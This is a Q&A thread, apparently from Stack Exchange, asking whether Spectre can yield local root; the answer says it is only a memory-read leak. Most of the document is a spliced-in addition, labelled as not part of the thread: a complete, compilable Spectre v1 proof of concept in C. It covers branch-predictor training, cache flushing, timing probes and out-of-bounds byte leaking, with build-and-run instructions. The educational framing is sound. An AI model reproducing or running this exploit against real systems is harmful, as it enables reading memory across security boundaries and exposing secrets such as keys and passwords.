
I heard that Spectre could be used to reveal arbitrary information from RAM, and I imagine it should ultimately be possible to automate getting root this way. At the same time, quite a few months have passed since this class of vulnerabilities was disclosed and I still haven't seen any convincing exploit.

Normally I would assume that this is in order to keep script kiddies out, but given that we're likely to stick with broken processors for a few years, anybody who published such a program would definitely get popular.

This leads me to the question: is it actually possible to get local root via Spectre? If so, what could be the reasons why no exploit has been published yet?

d33tah
    The exploit is a memory read only, so there is no clear, reliable path to privilege escalation. The PoC to leak information can be found here: https://bugs.chromium.org/p/project-zero/issues/detail?id=1272 – J.A.K. May 30 '18 at 17:43

1 Answer


As mentioned by J.A.K, the exploit (Spectre) is a way of gaining read-only access to memory. The reason there is no exploit for privilege escalation is that that isn't what is happening in Spectre. Both Spectre and Meltdown are by nature simply information leaks.
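The read primitive the comment and the answer refer to, as an added example that is not part of the original question, comment or answer: a Spectre variant 1 (bounds-check bypass) demo modelled on the public proof of concept released with the Spectre paper. The victim only ever performs loads; the misprediction is rolled back architecturally and all that survives is which cache line was touched, which is why this yields a byte-at-a-time read and nothing that writes memory or changes privilege. The secret string, the array layout, the 80-cycle cache-hit threshold and the function names are assumptions made for this demo; it is x86-64 only (clflush and rdtscp) and reports "unsupported" elsewhere.

```c
/* Spectre v1 (bounds-check bypass) read primitive. Added example modelled on the
 * public PoC from the Spectre paper; not code from the question or answer.
 * Secret, array layout and CACHE_HIT_THRESHOLD are assumptions; tune per CPU. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#if defined(__x86_64__)
#include <x86intrin.h>
#define SPECTRE_SUPPORTED 1
#else
#define SPECTRE_SUPPORTED 0
#endif

#define CACHE_HIT_THRESHOLD 80 /* cycles; assumed value, tune per machine */
#define STRIDE 512             /* one probe cache line per possible byte value */

uint8_t unused1[64];
uint8_t array1[160] = {1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16};
uint8_t unused2[64];
uint8_t array2[256 * STRIDE];
unsigned int array1_size = 16;
const char *secret = "The Magic Words are Squeamish Ossifrage."; /* constructed */
volatile uint8_t temp = 0; /* sink so the compiler keeps the dependent load */

/* Victim: a correctly bounds-checked read. With array1_size flushed from cache and
 * the predictor trained, the body runs speculatively with an out-of-bounds x; the
 * rollback discards the value, but array2[array1[x] * STRIDE] stays cached. */
void victim_function(size_t x) {
    if (x < array1_size)
        temp &= array2[array1[x] * STRIDE];
}

/* Decision rule from the original PoC, kept pure so it is testable without the
 * side channel: return guess j once it clearly leads runner-up k, else -1. */
int pick_byte(const int results[256]) {
    int j = -1, k = -1;
    for (int i = 0; i < 256; i++) {
        if (j < 0 || results[i] >= results[j]) { k = j; j = i; }
        else if (k < 0 || results[i] >= results[k]) { k = i; }
    }
    if (k < 0) k = j;
    if (results[j] >= 2 * results[k] + 5 || (results[j] == 2 && results[k] == 0))
        return j;
    return -1;
}

int spectre_supported(void) { return SPECTRE_SUPPORTED; }

#if SPECTRE_SUPPORTED
/* Leak array1[malicious_x] (any address, via an out-of-bounds index) as a byte. */
int spectre_leak_byte(size_t malicious_x, int results[256]) {
    static int warmed = 0;
    if (!warmed) { memset(array2, 1, sizeof array2); warmed = 1; } /* fault pages in */
    memset(results, 0, 256 * sizeof results[0]);
    for (int tries = 999; tries > 0; tries--) {
        for (int i = 0; i < 256; i++) _mm_clflush(&array2[i * STRIDE]);
        size_t training_x = tries % array1_size, x;
        for (int j = 29; j >= 0; j--) {
            _mm_clflush(&array1_size);
            for (volatile int z = 0; z < 100; z++) {} /* let the flush complete */
            /* Branch-free select: every 6th call uses malicious_x, the others
             * train the predictor with the in-bounds training_x. */
            x = ((j % 6) - 1) & ~0xFFFF;
            x = x | (x >> 16);
            x = training_x ^ (x & (malicious_x ^ training_x));
            victim_function(x);
        }
        /* Probe lines in scrambled order; a fast access means array1[malicious_x] == mix_i. */
        for (int i = 0; i < 256; i++) {
            int mix_i = ((i * 167) + 13) & 255;
            volatile uint8_t *addr = &array2[mix_i * STRIDE];
            unsigned int junk;
            uint64_t t0 = __rdtscp(&junk);
            junk = *addr;
            uint64_t dt = __rdtscp(&junk) - t0;
            if (dt <= CACHE_HIT_THRESHOLD && mix_i != array1[training_x])
                results[mix_i]++;
        }
        int guess = pick_byte(results);
        if (guess >= 0) return guess;
    }
    return pick_byte(results);
}
#endif

int main(void) {
#if SPECTRE_SUPPORTED
    size_t base = (size_t)(secret - (char *)array1); /* OOB index landing on secret */
    for (size_t i = 0; i < strlen(secret); i++) {
        int results[256], v = spectre_leak_byte(base + i, results);
        printf("%p = %3d '%c'\n", (const void *)(secret + i), v, (v >= 32 && v < 127) ? v : '?');
    }
#else
    puts("unsupported: this demo needs x86-64 (clflush + rdtscp)");
#endif
    return 0;
}
```

Build with `gcc -O1 -o spectre_v1 spectre_v1.c` on an x86-64 Linux box and run it; whether the secret string comes out depends on the CPU, system noise and the cache-hit threshold, so expect to adjust CACHE_HIT_THRESHOLD if most bytes come back as -1. Note what the attacker controls: an index into `array1` and a timer. The only architectural effect is the cache state, so the attack recovers bytes but cannot change them, which is the point the answer makes.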